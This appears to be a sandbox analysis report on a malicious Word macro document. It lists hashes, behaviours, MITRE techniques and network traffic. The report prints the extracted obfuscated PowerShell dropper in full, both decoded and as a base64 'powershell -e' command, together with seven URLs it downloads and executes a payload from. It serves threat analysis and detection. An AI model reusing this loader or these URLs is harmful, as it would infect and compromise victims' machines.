e203577dadb325bd364b0a6609b5aa2b4df457ba261810b3e5416950dff54c8f

Analysis

max time kernel
149s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
20/05/2024, 12:37 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

5f1bbe19a2333cb402ac624a46014f28_JaffaCakes118.doc
Size

154KB
MD5

5f1bbe19a2333cb402ac624a46014f28
SHA1

6bcd62ad194559166fbd621ff40d5069cc5b2d38
SHA256

e203577dadb325bd364b0a6609b5aa2b4df457ba261810b3e5416950dff54c8f
SHA512

089efbe2850665db146361b3cf64f9701e93d01dd270f500e0a0206fbdffcd5b8a86cda85a3a08c9af70c66fad01245026237bcf7105f4ba9cbcca8356e7f64c
SSDEEP

1536:cQYIQYjrdi1Ir77zOH98Wj2gpngB+a94+dRXalfAW66uud+BbN+rEw1:vrfrzOH98ipgXRE66uuoBsEw1

Score

10^/10

Malware Config

Extracted

Language

ps1

Source

1
$Y1u9kdm=('Yh'+('e0'+'qow'));&('new'+'-item') $enV:USeRPRoFile\m4Obyxb\O2ee0Qk\ -itemtype diRecTorY;[Net.ServicePointManager]::"se`cUr`I`Ty`pRoTOcol" = (('t'+'ls')+('12,'+' '+'tls1')+('1,'+' ')+('tl'+'s'));$Joc_rvg = ('W'+('_c'+'1')+('yy'+'z'));$Ty0lqd3=('C'+'d'+('c'+'3bi7'));$C43scuh=$env:userprofile+(('{0}M4ob'+'y'+'xb{0'+'}O2ee0'+'qk{0}') -F[Char]92)+$Joc_rvg+(('.'+'ex')+'e');$Lldqtcy=('D6'+('j_'+'nu')+'l');$Awcx2cw=&('n'+'ew-obje'+'c'+'t') nET.weBcLiENT;$Rf9snso=('ht'+('t'+'p://')+'g'+'i'+('v'+'in')+'gt'+'h'+'a'+('nksd'+'a')+'il'+'y'+'.'+'c'+('o'+'m/we'+'b/')+('V'+'K/')+('*'+'http')+':/'+'/'+('t'+'skge')+('a'+'r.co')+'m'+('/wp-c'+'on'+'t')+('ent'+'/upl'+'oads/2017')+('/'+'Fo/*'+'h')+('tt'+'p:/')+'/'+('d'+'uol')+('if'+'e-p')+('a'+'rtne')+('r'+'.c')+('o'+'m/wp-c')+'on'+('t'+'ent/')+'p'+('E'+'/*')+('htt'+'p:')+('//p'+'on'+'tu')+('ri'+'basc'+'he')+('t'+'cr')+'i'+('sti'+'a')+'n'+('ion'+'ut')+('.com'+'/wp')+('-'+'ad')+('mi'+'n/G/')+'*h'+('ttp'+'s:')+('/'+'/mrveg'+'gy.')+'c'+('om/e'+'rros/'+'t')+'S1'+('/*'+'http:'+'/')+('/if'+'armer.'+'com.br/_'+'_'+'MACO')+'S'+'X'+'/'+('2w4'+'/*h'+'tt')+('p:/'+'/')+('uni'+'t')+'ed'+('d'+'ataba')+('s'+'e.n'+'et/w'+'p-adm')+'i'+'n/'+('t'+'f/'))."SpL`iT"([char]42);$Bcgxfax=(('Lg6'+'n')+'m'+'6i');foreach($Vafutcz in $Rf9snso){try{$Awcx2cw."DOw`Nl`OA`DFILe"($Vafutcz, $C43scuh);$C1jnvi9=('Z4'+('hv'+'5')+'3u');If ((.('Get'+'-Ite'+'m') $C43scuh)."L`e`NgtH" -ge 30822) {&('Invo'+'k'+'e-Ite'+'m')($C43scuh);$U10cihq=(('G'+'amh')+('k'+'5k'));break;$Q7yl9z5=(('Mx'+'n5c')+'ay')}}catch{}}$Ivteku7=(('V'+'1lh')+'w'+'rz')

URLs

exe.dropper

http://givingthanksdaily.com/web/VK/

exe.dropper

http://tskgear.com/wp-content/uploads/2017/Fo/

exe.dropper

http://duolife-partner.com/wp-content/pE/

exe.dropper

http://ponturibaschetcristianionut.com/wp-admin/G/

exe.dropper

https://mrveggy.com/erros/tS1/

exe.dropper

http://ifarmer.com.br/__MACOSX/2w4/

exe.dropper

http://uniteddatabase.net/wp-admin/tf/

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2384	4560	powershell.exe	84

Blocklisted process makes network request 7 IoCs

flow	pid	Process
25	2384	powershell.exe
32	2384	powershell.exe
34	2384	powershell.exe
44	2384	powershell.exe
45	2384	powershell.exe
51	2384	powershell.exe
55	2384	powershell.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 2 IoCs

pid	Process
1692	WINWORD.EXE
1692	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2384	powershell.exe
2384	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2384	powershell.exe

Suspicious use of SetWindowsHookEx 7 IoCs

pid	Process
1692	WINWORD.EXE
1692	WINWORD.EXE
1692	WINWORD.EXE
1692	WINWORD.EXE
1692	WINWORD.EXE
1692	WINWORD.EXE
1692	WINWORD.EXE

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\5f1bbe19a2333cb402ac624a46014f28_JaffaCakes118.doc" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:1692

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -e JABZADEAdQA5AGsAZABtAD0AKAAnAFkAaAAnACsAKAAnAGUAMAAnACsAJwBxAG8AdwAnACkAKQA7ACYAKAAnAG4AZQB3ACcAKwAnAC0AaQB0AGUAbQAnACkAIAAkAGUAbgBWADoAVQBTAGUAUgBQAFIAbwBGAGkAbABlAFwAbQA0AE8AYgB5AHgAYgBcAE8AMgBlAGUAMABRAGsAXAAgAC0AaQB0AGUAbQB0AHkAcABlACAAZABpAFIAZQBjAFQAbwByAFkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAHMAZQBgAGMAVQByAGAASQBgAFQAeQBgAHAAUgBvAFQATwBjAG8AbAAiACAAPQAgACgAKAAnAHQAJwArACcAbABzACcAKQArACgAJwAxADIALAAnACsAJwAgACcAKwAnAHQAbABzADEAJwApACsAKAAnADEALAAnACsAJwAgACcAKQArACgAJwB0AGwAJwArACcAcwAnACkAKQA7ACQASgBvAGMAXwByAHYAZwAgAD0AIAAoACcAVwAnACsAKAAnAF8AYwAnACsAJwAxACcAKQArACgAJwB5AHkAJwArACcAegAnACkAKQA7ACQAVAB5ADAAbABxAGQAMwA9ACgAJwBDACcAKwAnAGQAJwArACgAJwBjACcAKwAnADMAYgBpADcAJwApACkAOwAkAEMANAAzAHMAYwB1AGgAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAKAAoACcAewAwAH0ATQA0AG8AYgAnACsAJwB5ACcAKwAnAHgAYgB7ADAAJwArACcAfQBPADIAZQBlADAAJwArACcAcQBrAHsAMAB9ACcAKQAgAC0ARgBbAEMAaABhAHIAXQA5ADIAKQArACQASgBvAGMAXwByAHYAZwArACgAKAAnAC4AJwArACcAZQB4ACcAKQArACcAZQAnACkAOwAkAEwAbABkAHEAdABjAHkAPQAoACcARAA2ACcAKwAoACcAagBfACcAKwAnAG4AdQAnACkAKwAnAGwAJwApADsAJABBAHcAYwB4ADIAYwB3AD0AJgAoACcAbgAnACsAJwBlAHcALQBvAGIAagBlACcAKwAnAGMAJwArACcAdAAnACkAIABuAEUAVAAuAHcAZQBCAGMATABpAEUATgBUADsAJABSAGYAOQBzAG4AcwBvAD0AKAAnAGgAdAAnACsAKAAnAHQAJwArACcAcAA6AC8ALwAnACkAKwAnAGcAJwArACcAaQAnACsAKAAnAHYAJwArACcAaQBuACcAKQArACcAZwB0ACcAKwAnAGgAJwArACcAYQAnACsAKAAnAG4AawBzAGQAJwArACcAYQAnACkAKwAnAGkAbAAnACsAJwB5ACcAKwAnAC4AJwArACcAYwAnACsAKAAnAG8AJwArACcAbQAvAHcAZQAnACsAJwBiAC8AJwApACsAKAAnAFYAJwArACcASwAvACcAKQArACgAJwAqACcAKwAnAGgAdAB0AHAAJwApACsAJwA6AC8AJwArACcALwAnACsAKAAnAHQAJwArACcAcwBrAGcAZQAnACkAKwAoACcAYQAnACsAJwByAC4AYwBvACcAKQArACcAbQAnACsAKAAnAC8AdwBwAC0AYwAnACsAJwBvAG4AJwArACcAdAAnACkAKwAoACcAZQBuAHQAJwArACcALwB1AHAAbAAnACsAJwBvAGEAZABzAC8AMgAwADEANwAnACkAKwAoACcALwAnACsAJwBGAG8ALwAqACcAKwAnAGgAJwApACsAKAAnAHQAdAAnACsAJwBwADoALwAnACkAKwAnAC8AJwArACgAJwBkACcAKwAnAHUAbwBsACcAKQArACgAJwBpAGYAJwArACcAZQAtAHAAJwApACsAKAAnAGEAJwArACcAcgB0AG4AZQAnACkAKwAoACcAcgAnACsAJwAuAGMAJwApACsAKAAnAG8AJwArACcAbQAvAHcAcAAtAGMAJwApACsAJwBvAG4AJwArACgAJwB0ACcAKwAnAGUAbgB0AC8AJwApACsAJwBwACcAKwAoACcARQAnACsAJwAvACoAJwApACsAKAAnAGgAdAB0ACcAKwAnAHAAOgAnACkAKwAoACcALwAvAHAAJwArACcAbwBuACcAKwAnAHQAdQAnACkAKwAoACcAcgBpACcAKwAnAGIAYQBzAGMAJwArACcAaABlACcAKQArACgAJwB0ACcAKwAnAGMAcgAnACkAKwAnAGkAJwArACgAJwBzAHQAaQAnACsAJwBhACcAKQArACcAbgAnACsAKAAnAGkAbwBuACcAKwAnAHUAdAAnACkAKwAoACcALgBjAG8AbQAnACsAJwAvAHcAcAAnACkAKwAoACcALQAnACsAJwBhAGQAJwApACsAKAAnAG0AaQAnACsAJwBuAC8ARwAvACcAKQArACcAKgBoACcAKwAoACcAdAB0AHAAJwArACcAcwA6ACcAKQArACgAJwAvACcAKwAnAC8AbQByAHYAZQBnACcAKwAnAGcAeQAuACcAKQArACcAYwAnACsAKAAnAG8AbQAvAGUAJwArACcAcgByAG8AcwAvACcAKwAnAHQAJwApACsAJwBTADEAJwArACgAJwAvACoAJwArACcAaAB0AHQAcAA6ACcAKwAnAC8AJwApACsAKAAnAC8AaQBmACcAKwAnAGEAcgBtAGUAcgAuACcAKwAnAGMAbwBtAC4AYgByAC8AXwAnACsAJwBfACcAKwAnAE0AQQBDAE8AJwApACsAJwBTACcAKwAnAFgAJwArACcALwAnACsAKAAnADIAdwA0ACcAKwAnAC8AKgBoACcAKwAnAHQAdAAnACkAKwAoACcAcAA6AC8AJwArACcALwAnACkAKwAoACcAdQBuAGkAJwArACcAdAAnACkAKwAnAGUAZAAnACsAKAAnAGQAJwArACcAYQB0AGEAYgBhACcAKQArACgAJwBzACcAKwAnAGUALgBuACcAKwAnAGUAdAAvAHcAJwArACcAcAAtAGEAZABtACcAKQArACcAaQAnACsAJwBuAC8AJwArACgAJwB0ACcAKwAnAGYALwAnACkAKQAuACIAUwBwAEwAYABpAFQAIgAoAFsAYwBoAGEAcgBdADQAMgApADsAJABCAGMAZwB4AGYAYQB4AD0AKAAoACcATABnADYAJwArACcAbgAnACkAKwAnAG0AJwArACcANgBpACcAKQA7AGYAbwByAGUAYQBjAGgAKAAkAFYAYQBmAHUAdABjAHoAIABpAG4AIAAkAFIAZgA5AHMAbgBzAG8AKQB7AHQAcgB5AHsAJABBAHcAYwB4ADIAYwB3AC4AIgBEAE8AdwBgAE4AbABgAE8AQQBgAEQARgBJAEwAZQAiACgAJABWAGEAZgB1AHQAYwB6ACwAIAAkAEMANAAzAHMAYwB1AGgAKQA7ACQAQwAxAGoAbgB2AGkAOQA9ACgAJwBaADQAJwArACgAJwBoAHYAJwArACcANQAnACkAKwAnADMAdQAnACkAOwBJAGYAIAAoACgALgAoACcARwBlAHQAJwArACcALQBJAHQAZQAnACsAJwBtACcAKQAgACQAQwA0ADMAcwBjAHUAaAApAC4AIgBMAGAAZQBgAE4AZwB0AEgAIgAgAC0AZwBlACAAMwAwADgAMgAyACkAIAB7ACYAKAAnAEkAbgB2AG8AJwArACcAawAnACsAJwBlAC0ASQB0AGUAJwArACcAbQAnACkAKAAkAEMANAAzAHMAYwB1AGgAKQA7ACQAVQAxADAAYwBpAGgAcQA9ACgAKAAnAEcAJwArACcAYQBtAGgAJwApACsAKAAnAGsAJwArACcANQBrACcAKQApADsAYgByAGUAYQBrADsAJABRADcAeQBsADkAegA1AD0AKAAoACcATQB4ACcAKwAnAG4ANQBjACcAKQArACcAYQB5ACcAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQASQB2AHQAZQBrAHUANwA9ACgAKAAnAFYAJwArACcAMQBsAGgAJwApACsAJwB3ACcAKwAnAHIAegAnACkA
1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2384

Network

DNS

roaming.officeapps.live.com

WINWORD.EXE

Remote address:

8.8.8.8:53

Request

roaming.officeapps.live.com

IN A

Response

roaming.officeapps.live.com

IN CNAME

prod.roaming1.live.com.akadns.net

prod.roaming1.live.com.akadns.net

IN CNAME

eur.roaming1.live.com.akadns.net

eur.roaming1.live.com.akadns.net

IN CNAME

uks-azsc-000.roaming.officeapps.live.com

uks-azsc-000.roaming.officeapps.live.com

IN CNAME

osiprod-uks-buff-azsc-000.uksouth.cloudapp.azure.com

osiprod-uks-buff-azsc-000.uksouth.cloudapp.azure.com

IN A

52.109.28.47
POST

https://roaming.officeapps.live.com/rs/RoamingSoapService.svc

WINWORD.EXE

Remote address:

52.109.28.47:443

Request

POST /rs/RoamingSoapService.svc HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: text/xml; charset=utf-8
User-Agent: MS-WebServices/1.0
SOAPAction: "http://tempuri.org/IRoamingSettingsService/GetConfig"
Content-Length: 511
Host: roaming.officeapps.live.com

Response

HTTP/1.1 200 OK

Cache-Control: private
Content-Type: text/xml; charset=utf-8
Server: Microsoft-IIS/10.0
X-OfficeFE: RoamingFE_IN_595
X-OfficeVersion: 16.0.17711.30575
X-OfficeCluster: uks-000.roaming.officeapps.live.com
X-CorrelationId: 6c9ddd84-f482-455c-a93c-ab08d56b1c7a
X-Powered-By: ASP.NET
Date: Mon, 20 May 2024 12:37:40 GMT
Content-Length: 654
DNS

104.219.191.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

104.219.191.52.in-addr.arpa

IN PTR

Response
DNS

172.210.232.199.in-addr.arpa

Remote address:

8.8.8.8:53

Request

172.210.232.199.in-addr.arpa

IN PTR

Response
DNS

47.28.109.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

47.28.109.52.in-addr.arpa

IN PTR

Response
DNS

46.28.109.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

46.28.109.52.in-addr.arpa

IN PTR

Response
DNS

14.160.190.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

14.160.190.20.in-addr.arpa

IN PTR

Response
DNS

givingthanksdaily.com

powershell.exe

Remote address:

8.8.8.8:53

Request

givingthanksdaily.com

IN A

Response

givingthanksdaily.com

IN A

66.96.134.60
GET

http://givingthanksdaily.com/web/VK/

powershell.exe

Remote address:

66.96.134.60:80

Request

GET /web/VK/ HTTP/1.1
Host: givingthanksdaily.com
Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found

Date: Mon, 20 May 2024 12:37:42 GMT
Content-Type: text/html
Content-Length: 867
Connection: keep-alive
Server: Apache
Last-Modified: Fri, 10 Jan 2020 16:05:10 GMT
Accept-Ranges: bytes
Expires: Mon, 20 May 2024 12:37:51 GMT
Age: 1
DNS

tskgear.com

powershell.exe

Remote address:

8.8.8.8:53

Request

tskgear.com

IN A

Response

tskgear.com

IN A

103.197.57.20
DNS

6.173.189.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

6.173.189.20.in-addr.arpa

IN PTR

Response
DNS

241.150.49.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

241.150.49.20.in-addr.arpa

IN PTR

Response
DNS

60.134.96.66.in-addr.arpa

Remote address:

8.8.8.8:53

Request

60.134.96.66.in-addr.arpa

IN PTR

Response

60.134.96.66.in-addr.arpa

IN PTR

601349666staticeigboxnet
GET

http://tskgear.com/wp-content/uploads/2017/Fo/

powershell.exe

Remote address:

103.197.57.20:80

Request

GET /wp-content/uploads/2017/Fo/ HTTP/1.1
Host: tskgear.com
Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently

Date: Mon, 20 May 2024 12:37:43 GMT
Server: Apache/2
Location: https://tskgear.com/wp-content/uploads/2017/Fo/
Content-Length: 255
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
GET

https://tskgear.com/wp-content/uploads/2017/Fo/

powershell.exe

Remote address:

103.197.57.20:443

Request

GET /wp-content/uploads/2017/Fo/ HTTP/1.1
Host: tskgear.com
Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently

Date: Mon, 20 May 2024 12:37:45 GMT
Server: Apache/2
X-Powered-By: PHP/8.0.30
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
X-Redirect-By: WordPress
Location: https://tskgear.com/product/foscor-double-helical/
Vary: User-Agent
Content-Length: 0
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET

https://tskgear.com/product/foscor-double-helical/

powershell.exe

Remote address:

103.197.57.20:443

Request

GET /product/foscor-double-helical/ HTTP/1.1
Host: tskgear.com

Response

HTTP/1.1 200 OK

Date: Mon, 20 May 2024 12:37:46 GMT
Server: Apache/2
X-Powered-By: PHP/8.0.30
Link: <https://tskgear.com/wp-json/>; rel="https://api.w.org/", <https://tskgear.com/wp-json/wp/v2/product/2919>; rel="alternate"; type="application/json", <https://tskgear.com/?p=2919>; rel=shortlink
Vary: Accept-Encoding,User-Agent
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
DNS

20.57.197.103.in-addr.arpa

Remote address:

8.8.8.8:53

Request

20.57.197.103.in-addr.arpa

IN PTR

Response

20.57.197.103.in-addr.arpa

IN PTR

da mymymarketcommy
GET

https://www.bing.com/th?id=OADD2.10239356736264_1E1NQW5LZ8SVSGPEK&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=24&h=24&dynsize=1&qlt=90

Remote address:

88.221.83.184:443

Request

GET /th?id=OADD2.10239356736264_1E1NQW5LZ8SVSGPEK&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=24&h=24&dynsize=1&qlt=90 HTTP/2.0
host: www.bing.com
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-type: image/png
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 999
date: Mon, 20 May 2024 12:37:45 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.b453dd58.1716208665.8a243e8
DNS

26.35.223.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

26.35.223.20.in-addr.arpa

IN PTR

Response
DNS

184.83.221.88.in-addr.arpa

Remote address:

8.8.8.8:53

Request

184.83.221.88.in-addr.arpa

IN PTR

Response

184.83.221.88.in-addr.arpa

IN PTR

a88-221-83-184deploystaticakamaitechnologiescom
DNS

226.21.18.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

226.21.18.104.in-addr.arpa

IN PTR

Response
DNS

duolife-partner.com

powershell.exe

Remote address:

8.8.8.8:53

Request

duolife-partner.com

IN A

Response
DNS

ponturibaschetcristianionut.com

powershell.exe

Remote address:

8.8.8.8:53

Request

ponturibaschetcristianionut.com

IN A

Response
DNS

mrveggy.com

powershell.exe

Remote address:

8.8.8.8:53

Request

mrveggy.com

IN A

Response

mrveggy.com

IN A

177.12.170.95
GET

https://mrveggy.com/erros/tS1/

powershell.exe

Remote address:

177.12.170.95:443

Request

GET /erros/tS1/ HTTP/1.1
Host: mrveggy.com
Connection: Keep-Alive

Response

HTTP/1.1 403 Forbidden

Date: Mon, 20 May 2024 12:37:49 GMT
Server: Apache
Content-Length: 380
Keep-Alive: timeout=5, max=500
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
DNS

ifarmer.com.br

powershell.exe

Remote address:

8.8.8.8:53

Request

ifarmer.com.br

IN A

Response
DNS

uniteddatabase.net

powershell.exe

Remote address:

8.8.8.8:53

Request

uniteddatabase.net

IN A

Response

uniteddatabase.net

IN A

173.254.237.178
DNS

95.170.12.177.in-addr.arpa

Remote address:

8.8.8.8:53

Request

95.170.12.177.in-addr.arpa

IN PTR

Response

95.170.12.177.in-addr.arpa

IN PTR

web-ded-218851akinghostnet
GET

http://uniteddatabase.net/wp-admin/tf/

powershell.exe

Remote address:

173.254.237.178:80

Request

GET /wp-admin/tf/ HTTP/1.1
Host: uniteddatabase.net
Connection: Keep-Alive

Response

HTTP/1.1 302 Found

Date: Mon, 20 May 2024 12:37:49 GMT
Server: Apache
Location: http://uniteddatabase.net/cgi-sys/suspendedpage.cgi
Content-Length: 235
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
GET

http://uniteddatabase.net/cgi-sys/suspendedpage.cgi

powershell.exe

Remote address:

173.254.237.178:80

Request

GET /cgi-sys/suspendedpage.cgi HTTP/1.1
Host: uniteddatabase.net

Response

HTTP/1.1 200 OK

Date: Mon, 20 May 2024 12:37:50 GMT
Server: Apache
Transfer-Encoding: chunked
Content-Type: text/html
DNS

178.237.254.173.in-addr.arpa

Remote address:

8.8.8.8:53

Request

178.237.254.173.in-addr.arpa

IN PTR

Response

178.237.254.173.in-addr.arpa

IN PTR

serverinfoscapemediacom
DNS

metadata.templates.cdn.office.net

WINWORD.EXE

Remote address:

8.8.8.8:53

Request

metadata.templates.cdn.office.net

IN A

Response

metadata.templates.cdn.office.net

IN CNAME

templatesmetadata.office.net

templatesmetadata.office.net

IN CNAME

templatesmetadata.office.net.edgekey.net

templatesmetadata.office.net.edgekey.net

IN CNAME

e26769.dscb.akamaiedge.net

e26769.dscb.akamaiedge.net

IN A

23.62.61.162

e26769.dscb.akamaiedge.net

IN A

23.62.61.184
GET

https://metadata.templates.cdn.office.net/client/templates/gallery?lcid=1033&syslcid=1033&uilcid=1033&app=0&ver=16&tl=2&build=16.0.12527&gtype=0%2C1%2C2%2C5%2C

WINWORD.EXE

Remote address:

23.62.61.162:443

Request

GET /client/templates/gallery?lcid=1033&syslcid=1033&uilcid=1033&app=0&ver=16&tl=2&build=16.0.12527&gtype=0%2C1%2C2%2C5%2C HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
Host: metadata.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Type: text/xml
Server: Kestrel
Content-Encoding: gzip
Content-Length: 1264
Cache-Control: max-age=139264
Date: Mon, 20 May 2024 12:37:56 GMT
Connection: keep-alive
Vary: Accept-Encoding
DNS

binaries.templates.cdn.office.net

WINWORD.EXE

Remote address:

8.8.8.8:53

Request

binaries.templates.cdn.office.net

IN A

Response

binaries.templates.cdn.office.net

IN CNAME

binaries.templates.cdn.office.net.edgesuite.net

binaries.templates.cdn.office.net.edgesuite.net

IN CNAME

a1847.dscg2.akamai.net

a1847.dscg2.akamai.net

IN A

2.17.251.23

a1847.dscg2.akamai.net

IN A

2.17.251.17
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp01840907.cab

WINWORD.EXE

Remote address:

2.17.251.23:443

Request

GET /support/templates/en-us/tp01840907.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 43653
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: 2jOARYFw5gy+pyYC/dDZVQ==
Last-Modified: Fri, 22 Apr 2016 16:08:15 GMT
ETag: 0x8D36AC84F8E1FB0
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 333d986d-301e-008a-4b97-a0d19b000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Mon, 20 May 2024 12:37:56 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851216.cab

WINWORD.EXE

Remote address:

2.17.251.23:443

Request

GET /support/templates/en-us/tp02851216.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 34816
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: YoYxJM3NoTXswOcieCy4iA==
Last-Modified: Fri, 22 Apr 2016 15:41:40 GMT
ETag: 0x8D36AC4993E3EB5
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 15d55d85-901e-0125-6d97-a0e68f000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Mon, 20 May 2024 12:37:56 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851220.cab

WINWORD.EXE

Remote address:

2.17.251.23:443

Request

GET /support/templates/en-us/tp02851220.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 31482
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: 8Q35ApgPHVvuqWssZoQIpw==
Last-Modified: Fri, 22 Apr 2016 15:41:41 GMT
ETag: 0x8D36AC499D1A9F8
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 62995edb-d01e-0069-0697-a067c5000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Mon, 20 May 2024 12:37:56 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851219.cab

WINWORD.EXE

Remote address:

2.17.251.23:443

Request

GET /support/templates/en-us/tp02851219.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
